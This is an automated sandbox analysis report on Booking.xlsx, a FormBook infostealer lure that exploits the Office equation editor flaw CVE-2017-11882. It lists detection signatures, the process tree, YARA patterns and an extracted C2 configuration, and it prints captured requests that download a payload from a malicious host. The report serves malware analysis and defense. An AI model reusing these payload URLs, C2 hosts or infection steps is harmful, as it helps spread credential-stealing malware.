Analysis Report Booking.xlsx

Overview

General Information

Sample Name: Booking.xlsx
Analysis ID: 356846
MD5: 889b85a1924c2498073da4f94d312cd0
SHA1: 0384c76d8fcc5ca57b63a21a169198b8dbc1f31b
SHA256: 3d3fc5984e22957b53d18bd58555c96b4895f4436f9ce1fed5dc2fb63878720c
Tags: Formbook, Maersk, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2340 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2900 cmdline: 'C:\Users\Public\vbc.exe' MD5: CACC98CE31DE0F63F04834BF952AC3DC)
      • vbc.exe (PID: 2856 cmdline: C:\Users\Public\vbc.exe MD5: CACC98CE31DE0F63F04834BF952AC3DC)
      • vbc.exe (PID: 2848 cmdline: C:\Users\Public\vbc.exe MD5: CACC98CE31DE0F63F04834BF952AC3DC)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2256 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2640 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Yara Overview

Memory Dumps

Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security
Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security

Unpacked PEs

Source: 4.2.vbc.exe.2342320.3.raw.unpack, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security
Source: 6.2.vbc.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 6.2.vbc.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 6.2.vbc.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Source: 4.2.vbc.exe.3453630.4.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 54.67.120.65, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2340, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2340, TargetFilename: C:\Users\Public\vbc.exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900
Sigma detected: Execution in Non-Executable Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900
Sigma detected: Suspicious Program Location Process Starts
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2340, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2900

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite, Avira URL Cloud: Label: malware
Found malware configuration
Source: 6.2.vbc.exe.400000.0.unpack, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1], ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 15%
Multi AV Scanner detection for submitted file
Source: Booking.xlsx, ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match, File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 6.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.2218174024.0000000000859000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
Source: excel.exe, Memory has grown: Private usage: 4MB later: 36MB
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00892CBC
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00892CC8
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_008990D1
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_008990E0
Source: global traffic, DNS query: name: ow.ly
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 54.67.120.65:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.evolvekitchendesign.com/ffw/
Connects to a URL shortener service
Source: unknown, DNS query: name: ow.ly
Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 23 Feb 2021 16:47:41 GMT | Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0 | Last-Modified: Tue, 23 Feb 2021 13:00:36 GMT | ETag: "6fe00-5bc0081234afa" | Accept-Ranges: bytes | Content-Length: 458240 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: global traffic, HTTP traffic detected: GET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1 | Host: www.jtelitetraining.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1 | Host: www.tiwapay.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View, IP Address: 103.141.138.118
Source: Joe Sandbox View, IP Address: 160.153.136.3
Source: Joe Sandbox View, ASN Name: GODADDY-AMSDE
Source: global traffic, HTTP traffic detected: GET /6gT330rxT5U HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: ow.ly | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /findoc/svchost.exe?platform=hootsuite HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: thdyworkfinerainbotm.dns.army
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E156B3.emf
Source: unknown, DNS traffic detected: queries for: ow.ly
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 23 Feb 2021 16:49:02 GMT | Server: Apache/2.4.46 (Unix) | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
              Source: explorer.exe, 00000007.00000000.2192124116.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: explorer.exe, 00000007.00000000.2192124116.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
              Source: vbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpString found in binary or memory: http://qunect.com/download/QuNect.exe
              Source: vbc.exe, 00000004.00000002.2181150885.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmpString found in binary or memory: http://qunect.com/download/QuNect.exeMOperation
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
              Source: explorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
